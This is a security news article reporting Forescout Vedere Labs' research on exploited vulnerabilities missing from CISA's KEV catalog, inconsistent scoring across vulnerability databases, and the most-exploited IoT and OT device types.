Forescout analyzes 90,000 unknown vulnerabilities, risk blind spots that live in the wild
Researchers at Forescout‘s Vedere Labs discovered 90,000 unknown vulnerabilities and risk blind spots in standard vulnerability guidance. These vulnerabilities, not included in the CISA Known Exploited Vulnerabilities (KEV) catalog, pose potential risks that cyber adversaries could exploit. The analysis also revealed inconsistencies in scoring vulnerabilities across databases, a process typically conducted using CVSS scores within the CVE ecosystem.
Titled, ‘Exposing the Exploited,’ the research identified that thousands of devices are affected by 28 vulnerabilities in Forescout’s catalog (untracked by CISA); while 83 percent of exploited vulnerabilities have either high or critical CVSS scores. Over 21,200 issues were discovered in 2023 with an unassigned CVE ID rising 4 percent from 2022 and up 45 percent from 2021.
Forescout said that 44 percent of the vulnerabilities without a CVE ID can be used to access a system, as 37 percent have high or critical severity and 45 exploited vulnerabilities did not have a CVE ID (2.15 percent of the total). The most common CVSS score was 9.8 for 571 vulnerabilities — while only 92 had a score of 10.
Further, a total of 2,087 distinct exploited vulnerabilities were seen across four databases – CISA KEV, AttackerKB, Shadowserver, and VL-KEV. No database alone contained all the information as CISA had 50 percent of the total exploited vulnerabilities (1055); 47 percent are seen in only one database (968); only 4 percent are seen in all four (90).
The data indicates that the most exploited OT and IoT devices include network attached storage (NAS) at 21 percent, IP cameras at 17 percent, building automation devices at 12 percent, and VoIP equipment at 11 percent.
“Vulnerabilities are being found, weaponized, and exploited in the wild faster than ever before, with 97 0-days exploited in 2023 and already 27 this year,” Elisa Costante, vice president of research at Forescout Research – Vedere Labs, said in a media statement. “Current methodologies for cataloging issues such as MITRE’s Common Vulnerabilities and Exposures (CVE) system and NIST’s National Vulnerability Database (NVD) are critical tools but have significant limitations. This research shows that even FIRST’s Common Vulnerability Scoring System (CVSS), the Exploit Prediction Scoring System (EPSS), and CISA’s Known Exploited Vulnerabilities (KEV) should not be used exclusively.”
“Only with the full picture of what a device is, how it is configured, and how it behaves on the network can a database of exploited vulnerabilities be effectively used for patching prioritization and risk mitigation,” according to a blog post. “This is especially true for OT networks where patching is a time-consuming effort that needs to be carefully planned.”
The research also disclosed ‘easy to find’ examples of vulnerabilities affecting Chinese devices commonly used in the West that do not have a CVE ID. “For example, there were 64,125 Chinese-made Ruijie routers exposed on the Internet at the time of writing this report. Some of these routers are vulnerable to at least two issues that we see exploited but have no CVE IDs: CNVD-2021-09650 and SSV-89107. They are most popular in China (73%), but there are thousands in the US (6,155) and UK (1,197), as well as hundreds in Japan (839) and several European countries, including Germany (790),” it added.
It also identified that there is no consistent way to score vulnerabilities across databases – which is done by CVSS scores in the CVE ecosystem. IBM X-force has details about the consequences and risks of many vulnerabilities in their database, even those without a CVE ID.
Forescout said that 44 percent of the vulnerabilities without a CVE ID can be used to gain access to a system, which is the most common consequence of those issues. At the same time, 56 percent of these vulnerabilities are considered ‘medium’ risk (with a score between 4.0 and 6.9) — while 37 percent have either ‘high or critical’ severity.
Furthermore, the data disclosed that the definition of what is exploited can change depending on the information source. “For instance, once a vulnerability is added to the CISA KEV, it is not removed afterward. Whereas sources based on honeypot data tend to be ‘dynamic’ in the sense that they reflect vulnerabilities that are currently being exploited. Some lists are manually updated based on human analysis. Others are automatically updated. For example, they could be based on detection rules from monitoring systems,” it added.
“There was a total of 2,087 distinct exploited vulnerabilities seen across the databases, but no database alone contains all the information. The database with the most vulnerabilities was AttackerKB, with 1,460 (70% of the total), but it relies on community information that potentially includes false positives,” the research revealed. “The database with the least vulnerabilities was Shadowserver, but that is because it relies solely on honeypot data which will miss the actions of targeted APTs, for instance, and only includes timely information, not historically exploited issues. CISA had 1,055 or 50% of the total exploited vulnerabilities.”
Additionally, each database contained several ‘unique’ vulnerabilities which are those that are only reported by that one database and no other. The database with the most unique vulnerabilities was AttackerKB. The one with the least unique vulnerabilities was CISA KEV because most of their information is included in AttackerKB by the community. Overall, 968 exploited vulnerabilities (47% of the total) are seen in only one database. Only 90 (4%) are seen in all four, meaning that relying on any one database alone can be dangerous.
Overall, more recent vulnerabilities are more likely to be exploited, Forescout reported. “In 2020, there was a sharp increase. Based on all available data, 55% of exploited vulnerabilities have been disclosed since 2020. Honeypot data (Shadowserver and part of VL-KEV) shows 61% of vulnerabilities were disclosed since 2020.”
After understanding what is exploited, Forescout focused on how these vulnerabilities are exploited. To do so, “we used only the data from VL-KEV vulnerabilities coming from AEE since those are the only for which we have information about exploit payloads and who was exploiting them.”
The research highlighted four key characteristics of exploited vulnerabilities: occurrences indicate the frequency of exploitation, IPs show the number of unique IP addresses attempting exploitation, days reveal the duration between the first and last exploitation, and payloads signify the variety of ways the vulnerability was exploited.
“More than a quarter of vulnerabilities were always exploited with the exact same payload,” it added. “Half of them were exploited with between two and ten different payloads. Only 2% of vulnerabilities were exploited with more than 1,000 different payloads. In most cases, these payloads come directly from or are small changes to public proof-of-concept (PoC) exploits.”
Although CISA mentions the existence of ‘a clear remediation action’ as a criterion for inclusion in KEV that does not always mean that a vulnerability can be patched. In some cases, the product is discontinued and there are no patches available. In others, only some versions can be patched while other versions are considered end-of-life. In the cases where there is no patch, CISA recommends users disconnect affected devices.
Forescout concluded that given the growing number of vulnerabilities found and exploited by malicious actors, organizations need help to understand what to prioritize. “CISA KEV is an important resource to help with this prioritization by identifying vulnerabilities that have been or are being exploited, but it suffers from issues. They include a lack of transparency on the selection of vulnerabilities.”
The Forescout report demonstrates that numerous exploited vulnerabilities impacting real organizations are not covered in CISA KEV. It also highlights the absence of a single comprehensive database for all exploited vulnerabilities, emphasizing the need for organizations to consult multiple sources. It’s essential to note that simply listing exploited vulnerabilities is insufficient without actionable risk mitigation strategies. For instance, a device with a vulnerable HTTP server version may not pose an immediate risk if the service is disabled.
To implement risk mitigation in a timely and efficient manner, organizations need a way to automatically identify assets on a vulnerable network, identify issues currently being exploited, and automatically understand the context in which these assets may be vulnerable.
Last month, Forescout raised an alarm about ignored security threats to exposed critical infrastructure environments. They examine the evolution of exposed OT/ICS (operational technology/industrial control system) data from 2017 to 2024 and highlight a complete disregard for critical infrastructure threats and the possibility of a mass attack.
Related
